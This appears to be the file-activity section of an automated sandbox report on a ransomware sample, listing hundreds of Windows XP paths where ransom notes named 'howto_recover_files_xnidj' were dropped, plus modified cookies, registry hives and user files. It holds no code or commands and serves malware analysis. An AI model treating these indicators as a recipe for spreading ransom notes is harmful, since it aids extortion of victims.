%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\0\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\59\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youtube[2].txt (1344 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ssl.bing[1].txt (1052 bytes)
%Documents and Settings%\Default User\PrintHood\howto_recover_files_xnidj.txt (2 bytes)
C:\totalcmd\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\38\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\10\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014040820140409\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\53\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\59\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Templates\powerpnt.ppt (454 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\26\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Cookies\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Windows\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Cookies\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\0\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\4\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\40\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\50\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Local Settings\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\History\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\29\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\53\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\CRLs\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Documents\My Music\My Playlists\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\28\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\UserData\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\3\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\SendTo\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT (8900 bytes)
%Documents and Settings%\All Users\Favorites\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sadpanda[1].txt (1020 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\VMware\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\33\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\42\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\10\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\12\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#kiks.yandex.ru\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\tmp\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Local Settings\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\Internet Explorer\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\48\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Local Settings\History\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[2].txt (1446 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\Certificates\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\My Documents\My Pictures\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\18\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\DRM\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\62\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Favorites\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\NetHood\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\54\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\32\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\SendTo\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\AU\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\History\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (1020 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\My Documents\recover_file_gtdrleovk.txt (249 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (1440 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\7\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\23\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\35\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\AU\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\38\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Communications\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temp\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\40\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\46\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\39\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\4\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\44\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\48\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\host\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\16\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\7\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Documents\My Music\Sample Music\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\host\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\49\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\41\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Favorites\Links\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\49\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\UserData\4XCFALMJ\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\27\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hm.baidu[1].txt (1020 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\CRLs\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\62\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Favorites\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\JavaScripts\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\7\howto_recover_files_xnidj.html (6 bytes)
C:\totalcmd\SIZE!.TXT (1606 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\2\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Cookies\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Credentials\S-1-5-21-1844237615-1960408961-1801674531-1003\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\3\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\UserData\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Accessories\Entertainment\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\44\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\1\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\PrintHood\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\22\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\62\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\47\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\51\howto_recover_files_xnidj.html (6 bytes)
C:\totalcmd\LANGUAGE\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\howto_recover_files_xnidj.txt (2 bytes)
C:\totalcmd\REGISTER.RTF (421 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Local Settings\Application Data\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\15\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\23\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\63\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\Forms\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\43\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Games\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\howto_recover_files_xnidj.html (6 bytes)
C:\System Volume Information\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\54\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Local Settings\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Desktop\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Application Data\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\59\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\47\howto_recover_files_xnidj.txt (2 bytes)
C:\totalcmd\HISTORY.TXT (3890 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\14\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Total Commander\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\36\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temp\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\62\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\UserData\KTOR0Z81\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\CRLs\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\19\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\AssetCache\E7VJ4HGS\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\61\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-20\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\24\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Media Player\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\VMware\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\6\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\43\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\Search\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\CTLs\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Communications\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\55\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\Water lilies.jpg (1181 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\13\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\Collab\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Recent\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\15\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msnportal.112.2o7[1].txt (1084 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\5\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Internet Explorer\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Acrobat\9.0\Collab\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Application Data\Microsoft\SystemCertificates\My\CTLs\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Identities\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\39\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\49\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\39\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\29\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Templates\powerpnt.ppt (454 bytes)
%Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\25\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Application Data\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\tmp\si\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\S-1-5-19\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\33\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Templates\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\11\howto_recover_files_xnidj.txt (2 bytes)
C:\totalcmd\DEFAULT.BAR (2816 bytes)
%Documents and Settings%\Default User\Cookies\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\1\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Local Settings\History\History.IE5\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\45\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\S-1-5-20\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\howto_recover_files_xnidj.html (6 bytes)
%System%\config\software (2560 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\20\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Start Menu\Programs\Startup\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Windows\Themes\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\Default User\Local Settings\Temp\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\51\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (1216 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\60\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Windows\howto_recover_files_xnidj.html (6 bytes)
C:\System Volume Information\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\18\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\55\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\17\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\S-1-5-19\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Recent\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\50\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\6\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\All Users\DRM\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Identities\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\GHISLER\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\UserData\KTOR0Z81\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\42\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\9\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Windows\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\17\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\37\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\howto_recover_files_xnidj.html (6 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\8\howto_recover_files_xnidj.txt (2 bytes)
%Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\46\howto_recover_files_xnidj.txt (2 bytes)
